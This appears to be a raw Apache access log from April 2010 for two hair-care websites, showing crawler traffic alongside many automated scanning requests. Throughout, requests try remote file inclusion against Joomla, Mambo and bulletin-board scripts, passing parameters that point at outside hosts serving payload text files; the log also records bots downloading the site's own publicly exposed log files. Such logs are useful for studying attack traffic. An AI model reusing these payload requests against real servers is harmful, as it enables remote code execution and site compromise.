67.195.112.151 - - [18/Apr/2010:17:03:49 -0700] "GET /freehairsecretsphp/ HTTP/1.0" 200 333 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
67.195.112.151 - - [18/Apr/2010:17:10:37 -0700] "GET /?N=D HTTP/1.0" 200 910 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
67.195.112.115 - - [18/Apr/2010:17:14:32 -0700] "GET /logs/access_091228.log HTTP/1.0" 200 636872 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "freehairsecrets.com"
77.88.25.28 - - [18/Apr/2010:17:17:47 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
67.195.114.238 - - [18/Apr/2010:17:28:42 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.freehairsecrets.com"
67.195.114.238 - - [18/Apr/2010:17:28:43 -0700] "GET /logs/access_091130.log HTTP/1.0" 200 674055 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.freehairsecrets.com"
67.222.152.66 - - [18/Apr/2010:17:29:42 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://buyrbid.com//images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [18/Apr/2010:17:29:42 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://buyrbid.com//images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [18/Apr/2010:17:29:42 -0700] "GET /logs/access_100412.log/components/com_performs/performs.php?mosConfig_absolute_path=http://buyrbid.com//images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [18/Apr/2010:17:29:57 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://buyrbid.com//images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [18/Apr/2010:17:29:57 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://buyrbid.com//images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [18/Apr/2010:17:29:57 -0700] "GET /logs/access_100412.log/components/com_performs/performs.php?mosConfig_absolute_path=http://buyrbid.com//images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
220.181.7.111 - - [18/Apr/2010:17:34:48 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12886 HTTP/1.1" 200 349 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "www.freehairsecrets.com"
67.222.152.66 - - [18/Apr/2010:17:36:29 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [18/Apr/2010:17:36:29 -0700] "GET /logs/access_100412.log%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [18/Apr/2010:17:36:29 -0700] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [18/Apr/2010:17:36:48 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [18/Apr/2010:17:36:48 -0700] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [18/Apr/2010:17:36:48 -0700] "GET /logs/access_100412.log%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.67.244.57 - - [18/Apr/2010:17:38:04 -0700] "GET /logs/access_091012.log//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://gonapus.net/zero/outlogin/mlogincon/1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.67.244.57 - - [18/Apr/2010:17:38:04 -0700] "GET /logs//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://gonapus.net/zero/outlogin/mlogincon/1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.67.244.57 - - [18/Apr/2010:17:38:04 -0700] "GET /com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://gonapus.net/zero/outlogin/mlogincon/1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
119.63.198.104 - - [18/Apr/2010:17:45:06 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12121 HTTP/1.1" 200 349 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "www.freehairsecrets.com"
184.73.79.204 - - [18/Apr/2010:17:47:49 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )" "freehairsecrets.com"
184.73.79.204 - - [18/Apr/2010:17:47:50 -0700] "GET /freehairsecretsphp/viewtopic.php?p=15183 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )" "freehairsecrets.com"
119.63.198.111 - - [18/Apr/2010:17:52:05 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12149 HTTP/1.1" 200 349 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "www.freehairsecrets.com"
209.216.43.133 - - [18/Apr/2010:17:52:23 -0700] "GET /logs//bbs///////delete_comment.php?board_skin_path=http://kumcalb.org///g4/adm/img/thumb/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.216.43.133 - - [18/Apr/2010:17:52:23 -0700] "GET /logs/access.log%20%20//bbs///////delete_comment.php?board_skin_path=http://kumcalb.org///g4/adm/img/thumb/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.216.43.133 - - [18/Apr/2010:17:52:26 -0700] "GET /bbs///////delete_comment.php?board_skin_path=http://kumcalb.org///g4/adm/img/thumb/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [18/Apr/2010:17:55:02 -0700] "GET /logs/access_100412.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [18/Apr/2010:17:55:09 -0700] "GET /logs/access_091228.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [18/Apr/2010:17:55:15 -0700] "GET /logs/access.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.222.152.66 - - [18/Apr/2010:17:55:15 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.222.152.66 - - [18/Apr/2010:17:55:15 -0700] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.222.152.66 - - [18/Apr/2010:17:55:30 -0700] "GET /logs/access_100315.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.216.43.133 - - [18/Apr/2010:17:56:15 -0700] "GET /logs/access.log//bbs///////delete_comment.php?board_skin_path=http://kumcalb.org///g4/adm/img/thumb/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.216.43.133 - - [18/Apr/2010:17:56:15 -0700] "GET /logs//bbs///////delete_comment.php?board_skin_path=http://kumcalb.org///g4/adm/img/thumb/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.216.43.133 - - [18/Apr/2010:17:56:15 -0700] "GET /bbs///////delete_comment.php?board_skin_path=http://kumcalb.org///g4/adm/img/thumb/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.216.43.133 - - [18/Apr/2010:17:56:16 -0700] "GET /bbs///////delete_comment.php?board_skin_path=http://kumcalb.org///g4/adm/img/thumb/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.216.43.133 - - [18/Apr/2010:17:56:16 -0700] "GET /logs//bbs///////delete_comment.php?board_skin_path=http://kumcalb.org///g4/adm/img/thumb/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.216.43.133 - - [18/Apr/2010:17:56:16 -0700] "GET /logs/access.log//bbs///////delete_comment.php?board_skin_path=http://kumcalb.org///g4/adm/img/thumb/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
119.63.198.80 - - [18/Apr/2010:17:56:51 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12617 HTTP/1.1" 200 349 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "www.freehairsecrets.com"
91.212.226.210 - - [18/Apr/2010:17:59:43 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Opera/9.0 (Windows NT 5.1; U; en)" "growlonghairfast.com"
91.212.226.210 - - [18/Apr/2010:17:59:43 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Opera/9.0 (Windows NT 5.1; U; en)" "growlonghairfast.com"
119.63.198.118 - - [18/Apr/2010:18:01:26 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12862 HTTP/1.1" 200 349 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "www.freehairsecrets.com"
209.216.43.133 - - [18/Apr/2010:18:01:27 -0700] "GET /bbs///////delete_comment.php?board_skin_path=http://kumcalb.org///g4/adm/img/thumb/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.216.43.133 - - [18/Apr/2010:18:01:27 -0700] "GET /logs/access.log%20%20//bbs///////delete_comment.php?board_skin_path=http://kumcalb.org///g4/adm/img/thumb/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.216.43.133 - - [18/Apr/2010:18:01:27 -0700] "GET /logs//bbs///////delete_comment.php?board_skin_path=http://kumcalb.org///g4/adm/img/thumb/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
186.28.232.13 - - [18/Apr/2010:18:09:12 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=com_extcalendar&_REQUEST[Itemid]=125&GLOBALS=&mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
186.28.232.13 - - [18/Apr/2010:18:09:12 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_extcalendar&_REQUEST[Itemid]=125&GLOBALS=&mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt??? HTTP/1.0" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
186.28.232.13 - - [18/Apr/2010:18:09:12 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_extcalendar&_REQUEST[Itemid]=125&GLOBALS=&mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
91.212.226.210 - - [18/Apr/2010:18:10:26 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)" "freehairsecrets.com"
91.212.226.210 - - [18/Apr/2010:18:10:26 -0700] "GET / HTTP/1.0" 200 910 "http://freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)" "freehairsecrets.com"
186.28.232.13 - - [18/Apr/2010:18:10:42 -0700] "GET /logs/access_100412.log//index.php?_REQUEST=&_REQUEST[option]=com_extcalendar&_REQUEST[Itemid]=125&GLOBALS=&mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
77.88.25.28 - - [18/Apr/2010:18:10:44 -0700] "GET /logs/access_091109.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
207.58.185.118 - - [18/Apr/2010:18:13:34 -0700] "GET /logs/access_100412.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.valmarko.lv/ru/cache/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
207.58.185.118 - - [18/Apr/2010:18:13:34 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.valmarko.lv/ru/cache/id1.txt? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
207.58.185.118 - - [18/Apr/2010:18:13:34 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.valmarko.lv/ru/cache/id1.txt? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "growlonghairfast.com"
89.107.104.82 - - [18/Apr/2010:18:13:55 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "growlonghairfast.com"
89.107.104.82 - - [18/Apr/2010:18:13:56 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "growlonghairfast.com"
216.104.36.82 - - [18/Apr/2010:18:27:59 -0700] "GET /bbs//write_update.php?board_skin_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.104.36.82 - - [18/Apr/2010:18:27:59 -0700] "GET /logs//bbs//write_update.php?board_skin_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.104.36.82 - - [18/Apr/2010:18:28:01 -0700] "GET /logs/access_100412.log%20%20//bbs//write_update.php?board_skin_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.104.36.82 - - [18/Apr/2010:18:28:07 -0700] "GET /bbs//write_update.php?board_skin_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.104.36.82 - - [18/Apr/2010:18:28:07 -0700] "GET /logs//bbs//write_update.php?board_skin_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.104.36.82 - - [18/Apr/2010:18:28:08 -0700] "GET /logs/access_100412.log%20%20//bbs//write_update.php?board_skin_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.104.36.82 - - [18/Apr/2010:18:29:46 -0700] "GET /logs/access_100412.log%20%20//bbs//write_update.php?board_skin_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.104.36.82 - - [18/Apr/2010:18:29:46 -0700] "GET /bbs//write_update.php?board_skin_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.104.36.82 - - [18/Apr/2010:18:29:46 -0700] "GET /logs//bbs//write_update.php?board_skin_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
89.107.104.82 - - [18/Apr/2010:18:29:54 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; AMD64)" "freehairsecrets.com"
89.107.104.82 - - [18/Apr/2010:18:29:54 -0700] "GET / HTTP/1.0" 200 910 "http://freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; AMD64)" "freehairsecrets.com"
77.221.130.15 - - [18/Apr/2010:18:40:34 -0700] "GET /logs/access.log//appserv/main.php?appserv_root=http://www.americinn.com//email-images/images/AinuLid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.221.130.15 - - [18/Apr/2010:18:40:34 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.americinn.com//email-images/images/AinuLid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.221.130.15 - - [18/Apr/2010:18:40:35 -0700] "GET /appserv/main.php?appserv_root=http://www.americinn.com//email-images/images/AinuLid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.221.130.15 - - [18/Apr/2010:18:48:56 -0700] "GET /logs/access_100104.log//appserv/main.php?appserv_root=http://www.americinn.com//email-images/images/AinuLid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.221.130.15 - - [18/Apr/2010:18:48:56 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.americinn.com//email-images/images/AinuLid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.221.130.15 - - [18/Apr/2010:18:48:56 -0700] "GET /appserv/main.php?appserv_root=http://www.americinn.com//email-images/images/AinuLid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.221.130.15 - - [18/Apr/2010:18:49:03 -0700] "GET /logs/access.log//appserv/main.php?appserv_root=http://www.americinn.com//email-images/images/AinuLid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.221.130.15 - - [18/Apr/2010:18:50:05 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.americinn.com//email-images/images/AinuLid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.221.130.15 - - [18/Apr/2010:18:50:05 -0700] "GET /appserv/main.php?appserv_root=http://www.americinn.com//email-images/images/AinuLid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.221.130.15 - - [18/Apr/2010:18:50:05 -0700] "GET /logs/access.log%20%20//appserv/main.php?appserv_root=http://www.americinn.com//email-images/images/AinuLid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.104.36.82 - - [18/Apr/2010:18:56:16 -0700] "GET /logs/access_100412.log//bbs//write_update.php?board_skin_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.104.36.82 - - [18/Apr/2010:18:57:04 -0700] "GET /logs/access_100412.log//bbs//write_update.php?board_skin_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.104.36.82 - - [18/Apr/2010:18:57:47 -0700] "GET /logs/access_100412.log//bbs//write_update.php?board_skin_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
72.46.157.102 - - [18/Apr/2010:19:05:50 -0700] "GET /logs/access_100412.log/index.php?contenido=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
72.46.157.102 - - [18/Apr/2010:19:05:50 -0700] "GET /index.php?contenido=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
204.236.211.159 - - [18/Apr/2010:19:10:20 -0700] "GET /logs/access_091207.log HTTP/1.1" 200 458752 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)" "www.freehairsecrets.com"
124.115.1.7 - - [18/Apr/2010:19:19:06 -0700] "GET /freehairsecretsphp/viewtopic.php?p=949 HTTP/1.1" 200 349 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "freehairsecrets.com"
216.104.36.82 - - [18/Apr/2010:19:19:50 -0700] "GET /logs//write_update.head.skin.php?board_skin_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.104.36.82 - - [18/Apr/2010:19:19:50 -0700] "GET /write_update.head.skin.php?board_skin_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.104.36.82 - - [18/Apr/2010:19:20:00 -0700] "GET /logs/access_100412.log%20%20//write_update.head.skin.php?board_skin_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.104.36.82 - - [18/Apr/2010:19:21:43 -0700] "GET /write_update.head.skin.php?board_skin_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.104.36.82 - - [18/Apr/2010:19:21:43 -0700] "GET /logs/access_100412.log%20%20//write_update.head.skin.php?board_skin_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.104.36.82 - - [18/Apr/2010:19:21:43 -0700] "GET /logs//write_update.head.skin.php?board_skin_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.104.36.82 - - [18/Apr/2010:19:22:41 -0700] "GET /logs//write_update.head.skin.php?board_skin_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.104.36.82 - - [18/Apr/2010:19:22:46 -0700] "GET /write_update.head.skin.php?board_skin_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.104.36.82 - - [18/Apr/2010:19:22:46 -0700] "GET /logs/access_100412.log%20%20//write_update.head.skin.php?board_skin_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.212.226.240 - - [18/Apr/2010:19:33:39 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Media Center PC" "growlonghairfast.com"
91.212.226.240 - - [18/Apr/2010:19:34:13 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Media Center PC" "growlonghairfast.com"
66.249.65.235 - - [18/Apr/2010:19:36:05 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.freehairsecrets.com"
77.88.25.28 - - [18/Apr/2010:19:42:01 -0700] "GET /logs/access_091026.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
74.55.128.226 - - [18/Apr/2010:19:47:05 -0700] "GET /logs/access_100308.log//delete_all.php?board_skin_path=http://swaramuslim.net/islam///pm/cp/r0x-seph-id.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "growlonghairfast.com"
74.55.128.226 - - [18/Apr/2010:19:47:05 -0700] "GET /logs/access_100322.log//delete_all.php?board_skin_path=http://swaramuslim.net/islam///pm/cp/r0x-seph-id.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "growlonghairfast.com"
74.55.128.226 - - [18/Apr/2010:19:47:05 -0700] "GET /delete_all.php?board_skin_path=http://swaramuslim.net/islam///pm/cp/r0x-seph-id.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "growlonghairfast.com"
74.55.128.226 - - [18/Apr/2010:19:47:05 -0700] "GET /logs//delete_all.php?board_skin_path=http://swaramuslim.net/islam///pm/cp/r0x-seph-id.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "growlonghairfast.com"
216.104.36.82 - - [18/Apr/2010:19:51:43 -0700] "GET /logs//write_update.head.skin.php?board_skin_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
216.104.36.82 - - [18/Apr/2010:19:51:43 -0700] "GET /logs/access.log//write_update.head.skin.php?board_skin_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
216.104.36.82 - - [18/Apr/2010:19:51:43 -0700] "GET /write_update.head.skin.php?board_skin_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
216.104.36.82 - - [18/Apr/2010:19:52:17 -0700] "GET /logs/access_100308.log//write_update.head.skin.php?board_skin_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.104.36.82 - - [18/Apr/2010:19:52:28 -0700] "GET /write_update.head.skin.php?board_skin_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
216.104.36.82 - - [18/Apr/2010:19:52:28 -0700] "GET /logs//write_update.head.skin.php?board_skin_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
216.104.36.82 - - [18/Apr/2010:19:52:28 -0700] "GET /logs/access.log//write_update.head.skin.php?board_skin_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
216.104.36.82 - - [18/Apr/2010:19:52:29 -0700] "GET /logs//write_update.head.skin.php?board_skin_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
216.104.36.82 - - [18/Apr/2010:19:52:29 -0700] "GET /logs/access.log//write_update.head.skin.php?board_skin_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
216.104.36.82 - - [18/Apr/2010:19:52:29 -0700] "GET /write_update.head.skin.php?board_skin_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
216.104.36.82 - - [18/Apr/2010:19:53:03 -0700] "GET /logs/access_100308.log//write_update.head.skin.php?board_skin_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.104.36.82 - - [18/Apr/2010:19:53:04 -0700] "GET /logs/access_100308.log//write_update.head.skin.php?board_skin_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
213.168.176.11 - - [18/Apr/2010:19:57:02 -0700] "GET /logs/access.log//mambots/content/multithumb/multithumb.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
213.168.176.11 - - [18/Apr/2010:19:57:02 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
213.168.176.11 - - [18/Apr/2010:19:57:02 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
